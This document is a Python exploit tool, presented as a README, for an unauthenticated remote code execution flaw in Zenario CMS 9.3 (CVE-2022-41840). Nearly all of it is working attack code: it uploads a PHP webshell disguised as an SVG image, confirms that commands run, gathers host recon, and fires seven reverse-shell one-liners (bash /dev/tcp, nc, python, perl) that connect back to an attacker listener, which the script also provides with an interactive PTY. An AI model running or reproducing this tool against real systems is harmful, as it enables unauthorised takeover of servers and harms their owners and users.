README.md
Rendering markdown...
#!/usr/bin/env python3
"""
Zenario CMS 9.3 - Unauthenticated RCE Exploit (CVE-2022-41840)
Upload endpoint (confirmed from PoC):
POST /zenario/ajax.php?method_call=handlePluginAJAX&cID=1&slideId=0&cType=html&instanceId=20&fileUpload
Field : fileUpload | MIME: image/svg+xml
JSON response: {"files":[{"name":"x.php","path":"private\/uploads\/RAND\/x.php"}]}
Shell: GET /private/uploads/RAND/x.php?cmd=id
Usage:
python3 zenario_exploit.py --target http://10.0.160.54 # interactive webshell
python3 zenario_exploit.py --target http://10.0.160.54 --cmd "id" # single command
python3 zenario_exploit.py --target http://10.0.160.54 --lhost 10.x.x.x --lport 4444 # reverse shell
"""
import requests, argparse, sys, re, time, json, random, string, threading, os, select, tty, termios
from urllib.parse import urljoin
requests.packages.urllib3.disable_warnings()
R="\033[91m"; G="\033[92m"; Y="\033[93m"; B="\033[94m"; C="\033[96m"; W="\033[0m"; BOLD="\033[1m"
def banner():
print(f"""{C}{BOLD}
╔══════════════════════════════════════════════════════════════╗
║ Zenario CMS 9.3 - Unauthenticated RCE (CVE-2022-41840) ║
║ Upload → JSON path → Webshell → Reverse PTY Shell ║
╚══════════════════════════════════════════════════════════════╝{W}
""")
def log(msg, level="info"):
tag = {"info":f"{B}[*]{W}","success":f"{G}[+]{W}",
"warn":f"{Y}[!]{W}","error":f"{R}[-]{W}","cmd":f"{C}[>]{W}"}.get(level,"[*]")
print(f"{tag} {msg}", flush=True)
# ── Webshell: tries multiple exec functions in order ─────────────────────────
# This ensures output even if system() or passthru() are disabled by PHP config
WEBSHELL = b"""<?php
$cmd = isset($_REQUEST['cmd']) ? $_REQUEST['cmd'] : '';
if($cmd == '') { echo 'SHELL_OK'; exit; }
ob_start();
if(function_exists('system')) { system($cmd); }
elseif(function_exists('passthru')) { passthru($cmd); }
elseif(function_exists('exec')) { echo exec($cmd); }
elseif(function_exists('shell_exec')){ echo shell_exec($cmd); }
elseif(function_exists('popen')) {
$h = popen($cmd, 'r');
while(!feof($h)) { echo fread($h,4096); }
pclose($h);
} else { echo 'NO_EXEC_FUNCTIONS'; }
$out = ob_get_clean();
echo $out;
?>"""
# ── Upload ────────────────────────────────────────────────────────────────────
def upload_shell(session, target, shell_name):
# instanceId cycles from PoC default (20) then common values
instance_ids = [20, 1, 2, 3, 4, 5, 10, 15, 25, 30, 40, 50]
c_ids = [1, 2, 3]
for cid in c_ids:
for iid in instance_ids:
ep = (f"/zenario/ajax.php?method_call=handlePluginAJAX"
f"&cID={cid}&slideId=0&cType=html&instanceId={iid}&fileUpload")
url = urljoin(target, ep)
log(f"Uploading → cID={cid} instanceId={iid}", "info")
try:
r = session.post(
url,
files={"fileUpload": (shell_name, WEBSHELL, "image/svg+xml")},
verify=False, timeout=15
)
log(f"HTTP {r.status_code} | {r.text[:200]}", "info")
if r.status_code == 200 and r.text.strip():
# Primary: parse JSON
try:
data = json.loads(r.text)
flist = data.get("files", [])
if flist:
raw = flist[0].get("path", "")
path = raw.replace("\\/", "/")
log(f"Path from JSON: {path}", "success")
return path
except json.JSONDecodeError:
pass
# Fallback: regex
m = re.search(r'"path"\s*:\s*"([^"]+)"', r.text)
if m:
path = m.group(1).replace("\\/", "/")
log(f"Path from regex: {path}", "success")
return path
except requests.exceptions.ConnectionError:
log("Connection refused — is target up?", "error")
sys.exit(1)
except Exception as e:
log(f"Error: {e}", "warn")
return None
# ── Verify & get shell URL ────────────────────────────────────────────────────
def verify_shell(session, target, shell_path):
if not shell_path.startswith("/"):
shell_path = "/" + shell_path
url = urljoin(target, shell_path)
log(f"Verifying shell → {url}", "info")
try:
r = session.get(url, params={"cmd": "echo SHELL_TEST_OK"}, verify=False, timeout=10)
log(f"Response body: [{r.text[:300]}]", "info") # show raw so we can debug
if "SHELL_TEST_OK" in r.text:
log("RCE confirmed — output received!", "success")
return url
elif "SHELL_OK" in r.text:
log("Shell reachable but exec functions may be restricted — trying anyway", "warn")
return url
elif "NO_EXEC_FUNCTIONS" in r.text:
log("Shell uploaded but all exec functions are disabled on this server!", "error")
return url # still return, user may want to try other things
elif r.status_code == 200:
log(f"Shell reachable (200) but got unexpected body. Raw: {r.text[:200]}", "warn")
return url
else:
log(f"HTTP {r.status_code} — shell may not be accessible", "warn")
except Exception as e:
log(f"Verify error: {e}", "warn")
return None
# ── Execute a command via webshell ────────────────────────────────────────────
def exec_cmd(session, shell_url, cmd):
try:
r = session.get(shell_url, params={"cmd": cmd}, verify=False, timeout=20)
return r.text.strip()
except Exception as e:
return f"[Error: {e}]"
# ── Reverse shell payloads ────────────────────────────────────────────────────
def get_reverse_payloads(lhost, lport):
return [
# Most reliable on Linux
f"bash -c 'bash -i >& /dev/tcp/{lhost}/{lport} 0>&1'",
# mkfifo (works when bash tcp redirection is blocked)
f"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc {lhost} {lport} >/tmp/f",
# Python3
f"python3 -c 'import socket,subprocess,os;s=socket.socket();s.connect((\"{lhost}\",{lport}));[os.dup2(s.fileno(),i) for i in range(3)];subprocess.call([\"/bin/bash\",\"-i\"])'",
# Python2 fallback
f"python -c 'import socket,subprocess,os;s=socket.socket();s.connect((\"{lhost}\",{lport}));[os.dup2(s.fileno(),i) for i in range(3)];subprocess.call([\"/bin/bash\",\"-i\"])'",
# Perl
f"perl -e 'use Socket;$i=\"{lhost}\";$p={lport};socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));connect(S,sockaddr_in($p,inet_aton($i)));open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/bash -i\");'",
# nc with -e
f"nc -e /bin/bash {lhost} {lport}",
# nc without -e (OpenBSD nc)
f"nc {lhost} {lport} | /bin/bash | nc {lhost} {lport}",
]
def trigger_reverse_shell(session, shell_url, lhost, lport):
payloads = get_reverse_payloads(lhost, lport)
log(f"Trying {len(payloads)} reverse shell payloads → {lhost}:{lport}", "info")
for i, payload in enumerate(payloads, 1):
log(f"[{i}/{len(payloads)}] {payload[:80]}...", "cmd")
try:
session.get(shell_url, params={"cmd": payload}, verify=False, timeout=4)
except Exception:
pass # timeout is expected when shell connects back
time.sleep(2)
# ── PTY listener (fully interactive) ─────────────────────────────────────────
def pty_listener(lport):
"""
Proper PTY-aware listener. Sets your terminal to raw mode so you get
a fully interactive shell (arrow keys, tab completion, Ctrl+C all work).
Automatically sends the PTY upgrade sequence on connect.
"""
import socket as _socket
s = _socket.socket(_socket.AF_INET, _socket.SOCK_STREAM)
s.setsockopt(_socket.SOL_SOCKET, _socket.SO_REUSEADDR, 1)
s.bind(("0.0.0.0", lport))
s.listen(1)
log(f"Listening on 0.0.0.0:{lport} (PTY mode) ...", "success")
log(f"Waiting for connection...", "info")
conn, addr = s.accept()
log(f"Got shell from {addr[0]}:{addr[1]}", "success")
s.close()
# Send PTY upgrade so we get a proper interactive shell
pty_upgrade = (
"python3 -c 'import pty;pty.spawn(\"/bin/bash\")' || "
"python -c 'import pty;pty.spawn(\"/bin/bash\")' || "
"script -q /dev/null /bin/bash\n"
)
conn.send(pty_upgrade.encode())
time.sleep(0.5)
# Send stty to fix terminal size
rows, cols = os.popen("stty size", "r").read().split() if os.popen("stty size", "r").read() else ("24", "80")
conn.send(f"stty rows {rows} cols {cols}\n".encode())
time.sleep(0.3)
conn.send(b"export TERM=xterm\n")
time.sleep(0.3)
log(f"{G}Shell upgraded! You have a PTY. Ctrl+C to kill.{W}", "success")
# Save old terminal settings and switch to raw mode
old_settings = termios.tcgetattr(sys.stdin)
try:
tty.setraw(sys.stdin.fileno())
conn.setblocking(False)
while True:
r, _, _ = select.select([conn, sys.stdin], [], [], 0.1)
if conn in r:
try:
data = conn.recv(4096)
if not data:
break
sys.stdout.buffer.write(data)
sys.stdout.buffer.flush()
except Exception:
break
if sys.stdin in r:
ch = sys.stdin.buffer.read(1)
if not ch:
break
conn.send(ch)
except Exception:
pass
finally:
termios.tcsetattr(sys.stdin, termios.TCSADRAIN, old_settings)
conn.close()
print(f"\n{Y}[!] Connection closed.{W}")
# ── Interactive webshell (fallback if reverse shell isn't needed) ─────────────
def interactive_webshell(session, shell_url):
log(f"{G}Webshell active. Type 'exit' to quit.{W}", "success")
print(f"{Y} URL → {shell_url}{W}")
print(f"{Y} Tip → type 'revshell <lhost> <lport>' to get a reverse PTY shell{W}\n")
while True:
try:
cmd = input(f"{C}webshell$ {W}").strip()
except (EOFError, KeyboardInterrupt):
print()
break
if not cmd:
continue
if cmd.lower() in ("exit", "quit"):
break
if cmd.startswith("revshell "):
parts = cmd.split()
if len(parts) == 3:
lhost, lport = parts[1], int(parts[2])
log(f"Starting PTY listener on :{lport} then triggering shell...", "info")
t = threading.Thread(target=pty_listener, args=(lport,), daemon=True)
t.start()
time.sleep(0.5)
trigger_reverse_shell(session, shell_url, lhost, lport)
t.join()
else:
log("Usage: revshell <lhost> <lport>", "warn")
continue
out = exec_cmd(session, shell_url, cmd)
if out:
print(out)
else:
print(f"{Y}(no output){W}")
# ── Main ──────────────────────────────────────────────────────────────────────
def main():
banner()
p = argparse.ArgumentParser(description="Zenario 9.3 Unauth RCE")
p.add_argument("--target", required=True, help="Target e.g. http://10.0.160.54")
p.add_argument("--lhost", help="Your IP for reverse shell")
p.add_argument("--lport", type=int, default=4444, help="Listener port (default: 4444)")
p.add_argument("--cmd", help="Single command to run and exit")
p.add_argument("--shell", help="Skip upload; use existing shell URL")
args = p.parse_args()
target = args.target.rstrip("/")
session = requests.Session()
session.headers["User-Agent"] = "Mozilla/5.0"
shell_url = args.shell
# ── Phase 1: Upload ───────────────────────────────────────────────────────
if not shell_url:
name = ''.join(random.choices(string.ascii_lowercase, k=7)) + ".php"
log(f"Target : {target}", "info")
log(f"Shell name : {name}", "info")
print()
path = upload_shell(session, target, name)
if not path:
log("Upload failed on all endpoints.", "error")
log("Hint: check the target's page source for instanceId=N in plugin URLs", "warn")
sys.exit(1)
print()
# ── Phase 2: Verify ───────────────────────────────────────────────────
shell_url = verify_shell(session, target, path)
if not shell_url:
log("Shell not reachable — check path manually", "error")
sys.exit(1)
print()
# ── Phase 3: Recon ────────────────────────────────────────────────────────
log("Recon:", "info")
for label, cmd in [
("id ", "id"),
("whoami ", "whoami"),
("hostname", "hostname"),
("uname ", "uname -a"),
("cwd ", "pwd"),
]:
out = exec_cmd(session, shell_url, cmd)
log(f" {label} → {G}{out if out else '(no output)'}{W}", "success")
print()
# ── Phase 4: Shell ────────────────────────────────────────────────────────
if args.cmd:
out = exec_cmd(session, shell_url, args.cmd)
print(f"\n{G}{out}{W}\n")
elif args.lhost:
log("Starting PTY listener then triggering reverse shell...", "info")
t = threading.Thread(target=pty_listener, args=(args.lport,), daemon=True)
t.start()
time.sleep(0.5)
trigger_reverse_shell(session, shell_url, args.lhost, args.lport)
t.join()
else:
interactive_webshell(session, shell_url)
if __name__ == "__main__":
main()